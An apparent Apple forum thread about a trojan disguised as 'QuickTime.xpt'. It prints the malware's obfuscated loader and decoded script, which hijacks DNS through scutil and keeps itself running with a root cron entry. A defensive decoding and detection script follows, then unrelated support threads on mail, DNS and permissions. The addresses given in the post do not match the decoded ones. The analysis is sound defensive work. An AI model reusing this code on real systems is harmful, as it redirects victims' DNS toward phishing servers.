QT Plugins mucking with DNS servers via scutil? Possible security issue?

Does anyone know why I would have a QuickTime.xpt file that needs to be run as root via 'cron' every minute?
(* * * * * \"/Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1)
The script itself looks up the 'PrimaryService' ID in State:/Network/Global/IPv4 and then creates entries for State:/Network/Service/<PrimaryServiceID>/DNS for 2 server addresses.
The current value of these addresses is:
85.225.113.141 c-8d71e155.11-500-64736c10.cust.bredbandsbolaget.se
85.225.112.232 ua-85-225-112-132.cust.bredbandsbolaget.se.
The other 'flakey' thing about this script is that it's crudely encrypted via:
#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aaw.asa;s2=cx.zxx.aaz.zwz;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
Which translates to:
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -l|grep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"
I am apparently not the only one who has seen this, but no one has posted anything definitively about what this came from, and why it is there. I'm inclined to both delete the script and remove the crontab entry, but want to make sure that some obscure Quicktime or other plug-in doesn't require it. I suspect that the "QuickTime.xpt" name is a smoke screen to make the unaware user THINK that it is an Apple specified file.
This may not be posted in the proper forum, so I will be reposting it under Networking and Mac OSX Leopard, since I've only seen it on my 10.5 system. (Hmmm. Shouldn't there be a security section somewhere?)

Duh! Never mind.
Took me less time to check the net via Google and determine it's a known 'trojan' attempt, than it took me to type up the question intelligently.
Well, at least it's now on Record in the Apple forums somewhere. Moderators, feel free to delete these two posts, or move them to the most appropriate forum.
"In OS X 10.5, your DNS entries will be altered to point to a malicious server to handle further requests. This can be disastrous if you are using Paypal, your online bank controls, or any other heavily phished targets."
Of course, it is only spurious, since a look at my routing table has never shown it pointing to these two servers. Might be the cause of some intermittent problems, but haven't seen any problems.
Time to change passwords just in case.
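
As an added example (not part of the original posts, and not the poster's or Apple's code), the shell functions below apply the two tr mappings quoted in the loader line to decode the script body and the s1/s2 address strings statically, then check crontab and scutil --dns output for the persistence entry and resolver change the post describes. The function names, the sample crontab and resolver listings, and 192.168.1.1 as the expected resolver are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: static decoding and host checks only.
# Nothing from the sample script is executed.

# Substitution alphabets copied from the loader line quoted in the post.
BODY_FROM='vdehrujzpbqafwtgkxyilcnos'
BODY_TO='upxmfqrzibdanwgkethlcyosv'
ADDR_FROM='qazwsxedcr'
ADDR_TO='0123456789'

# Directory the post's cron entry runs from.
PLUGIN_DIR='/Library/Internet Plug-Ins'

# Decode obfuscated script text on stdin into readable shell on stdout.
decode_body() {
    tr "$BODY_FROM" "$BODY_TO"
}

# Decode one letter-encoded address (the s1/s2 strings) given as $1.
decode_addr() {
    printf '%s\n' "$1" | tr "$ADDR_FROM" "$ADDR_TO"
}

# Read `crontab -l` output on stdin (check root's crontab too) and print
# every non-comment entry that references PLUGIN_DIR.
flag_cron_lines() {
    awk -v dir="$PLUGIN_DIR" '
        /^[[:space:]]*#/ { next }
        index($0, dir) > 0 { print }
    '
}

# Read `scutil --dns` output on stdin; arguments are the resolvers you
# expect. Prints each configured nameserver that is not in that list.
unexpected_nameservers() {
    allowed=" $* "
    awk '/nameserver\[[0-9]+\]/ { print $NF }' | sort -u |
    while read -r ns; do
        case "$allowed" in
            *" $ns "*) ;;
            *) printf '%s\n' "$ns" ;;
        esac
    done
}

# Constructed sample: a crontab listing containing the entry from the post.
sample_crontab() {
    cat <<'EOF'
# constructed crontab listing
0 3 * * * /usr/local/bin/backup.sh
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1
EOF
}

# Constructed sample in the format printed by `scutil --dns`.
sample_scutil_dns() {
    cat <<'EOF'
resolver #1
  nameserver[0] : 85.255.113.141
  nameserver[1] : 192.168.1.1
EOF
}

echo "Decoded first body line: $(printf '%s\n' '#!/bpf/oy' | decode_body)"
echo "Decoded s1: $(decode_addr cx.zxx.aaw.asa)"
echo "Decoded s2: $(decode_addr cx.zxx.aaz.zwz)"
echo "Flagged cron entries:"
sample_crontab | flag_cron_lines
echo "Unexpected nameservers:"
sample_scutil_dns | unexpected_nameservers 192.168.1.1
```

On a live system, pipe real data in instead of the samples: `crontab -l | flag_cron_lines` and `/usr/sbin/scutil --dns | unexpected_nameservers` followed by your known resolvers. Decoding s1 and s2 with the mapping on the page yields 85.255.113.141 and 85.255.112.232.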

Similar Messages

  • Possible Security issue with .zip files

    I found a potential issue with expanding .zip files. In the cases I've seen, the .zip files were created on Windows using Winzip. After copying the files to my OS X system, I double-clicked the file to expand the files and folders. (In this case the zip file was a Ruby on Rails web application.) In looking at the files in the terminal, all the files had wide open permissions - 777 - all users had full access to all files!
    I had to go through and reset the permissions (755 for folders, 644 for files), and had to reset the execute permission on the Ruby script files.
    I'm going to test some more with more zip files, but this could be a potentially huge problem.
    Also, I noticed that the files had the "extended attribute" of com.apple.quarantine set on each file - which I assume is being set as a function of being downloaded via Safari from my webmail (Gmail) account. The .zip file had this attribute set, and when expanded it propagated to each file and folder.

    The files don't have any security on them from windows - windows doesn't know anything about unix permissions.
    I've compressed other files and folders on Windows and decompressed them in Tiger without a problem. I would think, at a minimum, the files would inherit the permissions of the parent folder I expanded them into.

  • How can I resolve a possible security issue with unauthorized computers through QuickTime, as a diagnostic and screen shots show evidence of a Mac computer and I don't have one?

    I'm trying to resolve an issue that I have with my iPhone 4s through QuickTime. I think it might be an embedded mms that might broadcast my info as well as allow remote access sometimes. Any answers or similar activity? I can support with screenshots of public information. This shows in my email accounts as well.

    Is your phone jailbroken? If it is not, you're probably not seeing what you think you're seeing. If your phone hasn't been jailbroken, it's certainly not being controlled remotely. What do you mean by an "embedded mms"? Are you sharing an Apple ID with anyone? Or could someone have gotten access to your Apple ID information?

  • Possible Security Issues with Quicktime?

    Hi all,
    I keep a pretty close security watch on my computer and what is happening in the background. I have Norton NAV2008 and Spy Sweeper running and I am always going into Norton to see what the activity list has to say.
    Quicktime (qttask.exe) makes frequent and large changes to my Windows start-up files through modification of the registry settings.
    I do not like to see programs making these changes, as most malware and worms do this type of thing.
    Is this normal activity for Quick Time or should I be worried here?

    Ken,
    Thanks for answering. Norton just reports the activity as "qttask.exe has made 79 changes to your Windows Start up Files". It gives it a low priority and didn't come up as a "pop up" that required action. It seems like it knows that Quicktime is a program that sometimes does this and it is just reporting it as such.
    As I said, I have no idea whether QT does these changes on a regular basis as part of its program, hence my question here. Yes, QT is used by iTunes and that is what I exclusively use it for. iTunes doesn't work without it apparently, as I noticed the file manipulation and previously removed QuickTime. Then when I tried to use iTunes, it squawked and said QT wasn't installed.
    Thanks again for the reply.

  • What is going on with the DNS servers?

    I've been having intermittent connection problems with "DNS Server Not Responding" identified as the error by Win 7 troubleshooting for a little while now.
    This has been sporadic for a couple of months and usually resolves itself after a short time, but in the last few days I've barely been able to access the internet at all, with the exception of a handful of websites and today it came to a head and I could only access a couple of websites for most of the day.
    Thankfully I finally managed to find a website that I could access to remind myself of the addresses for the free google DNS servers and am now back online.
    Just wanted to stop by to report the issue and ask What on earth is going on with BTs DNS servers? 

    Hi Epona222,
    Thanks for posting. There are no reports of any specific issues with DNS servers but I can check your connection etc for you if you wish. Drop me an email with the details. You'll find the "contact us" form in the about me section of my profile.
    Cheers
    David
    BTCare Community Mod

  • Mail is not connecting with pop servers

    Question 1.- I have two email addresses that I manage with Mail.  Both are POP. Suddenly Mail stopped connecting with both of them.  I erased an account and can't set up the new one because it gives me an error message to check my user name and password.  On the other hand, my iphone is working fine with both servers. Support people at one of the providers couldn't help me.
    Can somebody help me?
    Question 2.- When I set up my Prodigy account, it automatically shows as "Yahoo POP". Prodigy has nothing to do with Yahoo, so does anybody know why this happens?
    Thank you!!!

    Okay, now we're a bit further... I hope...
    First,
    Just tried and now I can't send anything from the server Tagra from my iphone either!! What a mess!! It's telling me the server does not allow relaying.
    that's easy: You must be trying to send email with or from a different address (e.g. [email protected]) by using the Tagra SMTP server (mail.tagra.com.mx). Most SMTP servers don't like that and protest.
    So, on your iPhone, go to Settings and the Prodigy and any other non-Tagra account, and make sure that not mail.tagra.com.mx but the correct outgoing mail server is chosen! Only your Tagra account must use Tagra servers, no other one!
    For iPhone setup see e.g. this Prodigy iPhone setup.
    That should work again.
    Now back to your Mac.
    Your trouble could be the result of some hiccup in a DNS server. So, you'll make one addition and one change to be safe. No worries, it's nothing critical, I'll try to explain here:
    1) I guess the current DNS entry in your Mac (192.168.1.254) is your router's IP address, and in the router are DNS addresses stored. To be safe, please add in Network -> Advanced -> DNS under DNS server also these two numbers: 200.33.146.193 and 200.33.146.201, above the old number, and each one in its own line. These two are some of Prodigy's DNS servers. So, it should read now:
    200.33.146.193
    200.33.146.201
    192.168.1.254
    Okay! This will make sure that your Mac uses Prodigy DNS servers, no matter what's in your router, but the router stays in as well.
    2) In Apple Mail -> Preferences -> Prodigy account, replace the mail server names in text format with their IP addresses in number format. It's the same, but avoids certain trouble with DNS servers.
    For the Incoming Mail Server, make it: 148.235.52.179
    For the Outgoing Mail Server, make it: 148.235.52.32
    Again, it's the same servers, only in number format. And you can always change it back, only we have reason to hope that with the numbers it'll work.
    All other settings incl ports etc must remain the same, e.g. the same as in the iPhone instructions.
    Now close all apps, and restart the Mac.
    And now try if Apple Mail works for your Prodigy account... I'm crossing my fingers...

  • Best practices for 2 x DNS servers with 2 x sites

    I am curious if someone can help me with best practices for my DNS servers.  Let me give my network layout first.
    I have 1 site with 2 x Windows 2012 Servers (1 GUI - 10.0.0.7, the other CORE - 10.0.0.8) the 2nd site connected via VPN has 2 x Windows 2012R2 Servers (1 GUI - 10.2.0.7, the other CORE - 10.2.0.8). All 4 servers are promoted to DC's and have DNS services running.
    Here goes my questions:
    Site #1
    DC-01 - NIC IP address for DNS server #1 set to 10.0.0.8, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.2.0.7 & 10.2.0.8)
    DC-02 - NIC IP address for DNS server #1 set to 10.0.0.7, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.2.0.7 & 10.2.0.8)
    Site #2
    DC-01 - NIC IP address for DNS server #1 set to 10.2.0.8, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.0.0.7 & 10.0.0.8)
    DC-02 - NIC IP address for DNS server #1 set to 10.2.0.7, DNS server #2 set to 127.0.0.1 (should I add my 2nd sites DNS servers under Advanced as well? 10.0.0.7 & 10.0.0.8)
    Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local > properties > Name Servers should I have all of my other DNS servers, or should I have my WAN DNS servers? In a single server scenario I always put my WAN DNS server but a bit unsure in this scenario.
    Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local > properties > General > Type should all servers be set to Active Directory - Integrated > Primary Zone? Should any of these be set to Secondary Zone?
    Under the DNS management > Forward Lookup Zones > _msdcs.mydomain.local > properties > Zone Transfers should I allow zone transfers?
    Would the following questions be identical to the Forward Lookup Zone mydomain.local as well?

    Site1
    DC1: Primary 10.0.0.7. Secondary 10.0.0.8. Tertiary 127.0.0.1
    DC2: Primary 10.0.0.8.  Secondary 10.0.0.7. Tertiary 127.0.0.1
    Site2
    DC1: Primary 10.2.0.7.  Secondary 10.2.0.8. Tertiary 127.0.0.1
    DC2: Primary 10.2.0.8.  Secondary 10.2.0.7. Tertiary 127.0.0.1
    The DC's should automatically register in msdcs. Do not register external DNS servers in msdcs or it will lead to issues. Yes, I recommend all zones to be set to AD-integrated. No need to allow zone transfers as AD replication will take care of this for you. Same for mydomain.local.
    Hope this helps.  

  • Update Policy for multiple networks with specific DNS servers

    I have a mid size network with 5 locations all with different IP addresses. All sites host their own DNS servers and connect directly through an ISP dedicated VLAN.
    Main Site
    10.1.1.1
    255.0.0.0
    Remote Site 1
    192.168.100.1
    255.255.255.0
    Remote Site 2
    192.168.101.1
    255.255.255.0
    Remote Site 3
    192.168.102.1
    255.255.255.0
    Remote Site 4
    192.168.103.1
    255.255.255.0
    All sites can be managed through the main site, but have their own DNS servers on location.
    My purpose is to point all computers and devices to a new DNS server from their previous static assignment. (XP and later versions)
    My question is can I use GP or DHCP* to push DNS server information to each device making them site specific without having to travel to those locations?
    Requirements:
    All devices on 10.1.1.1 will be changing from 10.1.1.2 to 10.1.1.4 (decom of old 2k3 server)
    DNS servers at each 192 location will need to point secondary server to 10.1.1.4
    Devices at main will need to use 10.1.1.4 as primary and 10.1.1.3 as secondary.
    Devices at each site will need to keep their respective DNS server.
    *If I use DHCP to change the information on a per scope level, can I use GP to force computers with locally set static assignments to update to DHCP static assignments
    Bonus: If anyone can give me an estimate on how much network traffic/bandwidth this would create that would be great because I would consider staggering the assignments as I am a 24 hour business.

    Hi,
    You may configure a Scheduled Task Item in Group Policy.
    To create a new Scheduled Task preference item, please follow the steps below,
    Open the Group Policy Management Console. Right-click the Group Policy object (GPO) that should contain the new preference item, and then click Edit.
    In the console tree under Computer Configuration or User Configuration, expand the Preferences folder, and then expand the Control Panel Settings folder.
    Right-click the Scheduled Tasks node, point to New, and select Scheduled Task.
    In the New Scheduled Task Properties dialog box, select an Action for Group Policy to perform. (For more information, see "Actions" in this topic.)
    On the Task tab, enter task settings for Group Policy to configure or remove. (For more information, see "Task settings" in this topic.)
    If creating, updating, or replacing a task:
    Click the Schedule tab, and configure one or more schedules for the task. (For more information, see "Schedule settings" in this topic.)
    Click the Settings tab, and enter any additional task settings for Group Policy to configure. (For more information, see "Other scheduled task settings" in this topic.)
    Click the Common tab, configure any options, and then type your comments in the Description box. (For more information, see Configure Common Options.)
    Click OK. The new preference item appears in the details pane.
    In the task, you may use netsh to set the DNS address.
    netsh interface ip set dns name="Local Area Connection" static yourdnssetting
    Here is an article about netsh command,
    http://technet.microsoft.com/en-us/library/cc738592(v=WS.10).aspx#BKMK_5
    Hope this helps.
    Steven Lee
    TechNet Community Support

  • DNS forwarder with 2 real DNS servers, querying them simultaneously

    DNS forwarder with >2 real DNS servers, querying them simultaneously and ignoring "server can't find" errors
    Hi. When I connect to VPN, my normal DNS isn't queried, and DNS given by VPN answers: "server can't find"
    An extract from 'man resolv.conf'
    If there are multiple servers, the resolver library queries them in the  order  listed.
    I need another logic. All servers should be queried at the same time, and the soonest positive reply should be used.
    The algorithm used is to try a name server, and if the query times out, try the next, until out of name servers, then repeat trying all the name servers until a maximum number of retries are made.
    So, if I get "server can't find" error, the next DNS server is not queried. I want the DNS forwarder to ignore such answers and wait for replies from other servers.
    What software can do this? Maybe dnsmasq? I plan to add 'nameserver 127.0.0.1' to the top of my resolv.conf and configure my scripts to add other nameservers below.

    All servers should be queried at the same time
    --all-servers
    dnsmasq: ignoring nameserver 127.0.0.1 - local interface
    good.
    How to tell dnsmasq to completely disable dhcp? List all interfaces like this?
    no-dhcp-interface=eth0
    no-dhcp-interface=tun0
    no-dhcp-interface=vboxnet0
    no-dhcp-interface=wlan0

  • Configuring DNS servers with PPPoE

    Hi all,
    just received my base station, I'm trying to configure a custom couple of dns servers ( usually I work with opendns instead of the default ones from my ISP ) but after checking I notice that base station is still working with the default dns of my ISP. I tried to reset and re-configure the PPPoE connection but it still doesn't work.
    Any suggestion?

    Hello again, I feel sort of annoying by posting so many things. 
    I created a user in DC3 and it was replicated to DC1-New. If I do it the other way around, it does not work.
    In other words, the replication process only works this way DC3 --> DC1-New. I have checked it is not a firewall issue, all are off, since I began this lab.
    If I run repadmin /showrepl in DC1-New ,
    it sees DC3 and all success messages regarding the replication.
    If I run repadmin /showrepl in DC3,
    it just sees nothing.
    I also run dcdiag /test:knowsofroleholders in DC3 and
    there is this message: The holder of the Schema master is a deleted DC (DC1) . The same of all the 5 FSMOs. 
    I am trying to find a way to tell DC3 that the FSMOs holder is not DC1, but DC1-New. 
    Thanks for your support.
    Luis Olías Técnico/Admon Sistemas . Sevilla (España - Spain)

  • Obtaining DNS servers automatically on Cisco ADSL routers;" not static dns with command dns-server x.x.x.x" ?

    Obtaining DNS servers automatically on Cisco ADSL routers;" not static dns with command dns-server x.x.x.x" ?

    Ok Thank you Karsten

  • Enterprise DNS servers are not responding when using Windows NLB with Direct Access 2012

    Hi
    We have installed Direct Access 2012 as one server installation:
    - Two network cards. First one in DMZ and second one in internal network
    - Two consecutive IP addresses configured in DMZ because of Teredo
    - PKI because of Win7 Clients IPSec
    - Our corporate network is native IPv4 so we use DNS64/NAT64 and DA-server is configured as DNS
    - DA-servers are VMWare virtual machines 
    One server installation works fine and now we want to use Windows NLB as load balancing. NLB installation goes fine too,
    but problem is DNS. If we still try to use DA-server as DNS there comes error message below
    None of the enterprise DNS servers 2002:xxxx:xxxx:3333::1 used by DirectAccess clients for name resolution are responding. This might affect DirectAccess client connectivity to corporate resources.
    When trying to configure DNS using Infrastructure access setup, DNS cannot be validated when using DA-servers DIP or cluster VIP. Only domain local DNS looks to be ok but those have no IPv6 addressess. So how DNS should be configured when using multicast
    NLB? 
    Tried to remove name suffix then adding again => Detect DNS server => DA-server IPv6 address found => validate => The specified DNS server is not responding...
    Then tried to ping detected address => General failure
    NLB clusters are configured as multicast and static ARPs are configured too. Both clusters can be connected from those subnets as they should be. 
    Any clues how to fix this?
    ~ Jukka ~

    Hi,
    Your question falls into the paid support category which requires a more in-depth level of support.  Please visit the below link to see the various
    paid support options that are available to better meet your needs.
    http://support.microsoft.com/default.aspx?id=fh;en-us;offerprophone
    Regards,
    Mike

  • Manually set DNS servers in BT Homehub 2.0 with BT...

    Rather than having to set my DNS manually in network connections I was wondering if there was a setting on the homehub for changing DNS servers as I would like to use OpenDNS so I can test their web filtering capabilities.
    I have browsed the hub settings but there doesn't appear to be any setting to set DNS servers statically, it seems to automatically use BT's DNS servers when the connection is live.

    Hi hippomango, your solution to override the DNS settings in the BT Homehub sounds interesting - except that I cannot get them to work!?
    I have a BT Homehub 3.0 (yes, you still can't override the default DNS settings), but I can't see that making much of a difference. I can't get any of the computers (wired or wireless) to use the OpenDNS settings in the 2nd router, they always find the BT DNS.
    Wondering if you can explain some more detail about your set up if possible?
    - Presumably your BT Hub is still your default gateway?
    - Your 2nd router (Netgear) has the BT Hub as the default gateway?
    - All computers are DHCP? Or do you have some static? (At least 1 of my machines needs a static local IP, but DHCP for the majority)
    TBH, I don't know how the DMZ helps in this case? (But that may be because I don't quite understand what's going on!) Doesn't the DMZ influence incoming traffic? Don't we want to direct outbound traffic?
    Thanks for any info.

  • Mac using OS X 10.7 infected with dns changer?

    Hi. I was recently alerted by my internet company that my computer was infected with a virus called “dns changer.” Upon further inspection I found that one of my DNS servers matched up with a list of known rogue DNS servers.
    I have downloaded several virus scanning programs, such as macscan and virusbarrier x6 which were recommended to me. They didn’t turn up anything.
    I’ve been through the OS X 10.7 topics on the mac community as well as other websites (couldn’t find the “plugins.settings” in my Internet Plug-Ins folder and tried to pry it out using terminal). The same bad DNS server has mysteriously appeared on other computers that use the same internet connection out of my home and have not had any untrustworthy downloads.
    This is a real head scratcher. If anybody could help it would be much appreciated!

    I've recently had the same thing! I did the instructions above and got this
    Last login: Sun Apr 22 15:11:46 on ttys000
    dhcp-149-144-209-103:~ megansmart$ /usr/sbin/scutil --dns | grep nameserver
      nameserver[0] : 131.172.2.2
      nameserver[1] : 131.172.4.1
    dhcp-149-144-209-103:~ megansmart$
    help!

  • Problem with DNS

    Hello,
    I am relatively new to configuring DNS settings in Server Manager. Recently, my Kerberos realm stopped working and I am now getting this error message on the console:
    configured name and reverse DNS name do not match (fileserver.occu-med.com != mail.occu-med.net), various services may not function properly - use changeip to repair and/or correct DNS
    I did, for a short time, try to register the server as a mail server. However, due to the many issues I experienced, this was a short lived endeavor. Right now I am running 10.4.11 on an Xserv. The box is functioning as a Fileserver running AFP and SMB, DHCP server, DNS Server, Firewall and NAT, an AD Server, and a VPN server. I have had no issues with the other services, they are all functioning fine. The only problem with OD is that it cannot Kerberize if the DNS is not functioning properly.
    I believe that the issue with the DNS can be attributed to the server being part of an external DNS realm as well as an internal DNS realm. There is definitely an entry for mail.occu-med.net in our ISP's DNS server, however on the internal network that I am running, occu-med.com, there is no such entry in our DNS records.
    I have tried the changeip command "changeip LDAPv3/127.0.0.1 "externaladdress" 10.0.0.2 mail.occu-med.net fileserver.occu-med.com" to no avail.
    When I go into the Server Admin tool to look at my network connections, it lists connection en0 (The outside portion of the NAT) as mail.occu-med.net. The connection en1 (the inside portion of the NAT) does not have an assigned DNS name.
    When I go into the Terminal on the Xserv and type in "hostname" I get "Fileserver.occu-med.com." However when I type in "host fileserver.occu-med.com" I get the error "Host fileserver.occu-med.com not found: 3(NXDOMAIN)" When I type in "host externalip" I get "externalip.in-addr.arpa domain name pointer mail.occu-med.net."
    Obviously the server is confused here, but how exactly can I fix the problem?

    DNS was working right before the server was propagated to a mail server. I have set up our internal domain to mirror the external domain by entering all of the ISP specific DNS information into the server so that users can access mail.occu-med.com via the internet. I have also set up specific internal DNS names that are not shared with the outside world, such as fileserver.occu-med.com that I do not want published to the external DNS servers. The problem I cannot get around is where the entry mail.occu-med.net is coming from and why it persists. When I was messing around with the mail functions of OS X Server, I deliberately made two different domains, one for occu-med.net and one for occu-med.com. This was short lived as the confusion on where to connect for certain services was giving even myself a headache, let alone my users. That's when I started delving into setting up our own internal DNS server to provide FQDN services to internal machines. I deleted all of the old information in the server for the previous DNS Zones, but apparently something has not changed.
    Using a computer on the inside of my network, if I type into the console host mail.occu-med.net it returns "mail.occu-med.net has address 216.251.43.97"
    If I type host 209.234.153.2 I get "2.153.234.209.in-addr.arpa domain name pointer mail.occu-med.net."
    So, the server IS providing the wrong information to the internal clients somehow. The problem is that there is no mail.occu-med.net domain even hosted on the server. When I was originally messing around with the server as a mail server, I had the connections reversed, en0 was the inside connection and en1 was the outside. I did have DNS working properly when I did this. Is it possible that somehow, while it may not be displayed in the Server Admin window, the current outside interface is still assigned the FQDN mail.occu-med.net?
